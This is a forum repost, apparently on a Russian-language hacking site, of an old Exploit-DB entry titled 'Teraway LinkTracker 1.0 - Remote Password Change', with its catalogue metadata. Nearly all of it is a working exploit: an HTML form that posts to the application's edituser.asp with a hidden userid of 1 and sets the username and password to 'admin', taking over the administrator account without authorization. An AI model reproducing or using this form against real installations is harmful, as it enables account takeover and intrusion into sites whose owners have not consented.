Exploit Teraway LinkTracker 1.0 - Remote Password Change

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8553
Проверка EDB
  1. Пройдено
Автор
THE G0BL!N
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-04-27
HTML:
<title>Teraway LinkTracker V1.0  Remote Password Change</title>
<form name="form1" method="post" action="http://www.teraway.com/linktracker/demo/edituser.asp">
  <table width="90%" border="0" cellspacing="2" cellpadding="2" align="center">
    <tr>
      <td class="Titles">Cod[3]d By ThE g0bL!N Fi Khater Cristal wa x.CJP.x :)</td>

        
        <input type="hidden" name="userid" value="1">
         </td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Name :</b></td>

      
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>E-mail :</b></td>
      <td> <input type="text" name="email" size="40" value="[email protected]" maxlength="250">
      </td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Username :</b></td>

      <td> <input type="text" name="usr" size="40" value="admin" maxlength="250">
      </td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Password :</b></td>
      <td> <input type="password" name="pwd" size="40" value="admin" maxlength="250">
      </td>
    </tr>
   
      </td>
    </tr>
    <tr class="optionname">
      <td width="200">&nbsp; </td>
      <td> <input name="button" type="submit" class="generalText" value="Save User" onclick="alerta();">
      </td>
    </tr>

    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>
  </table>
</form>
</body>
</html>

# milw0rm.com [2009-04-27]
 
Источник
www.exploit-db.com

Похожие темы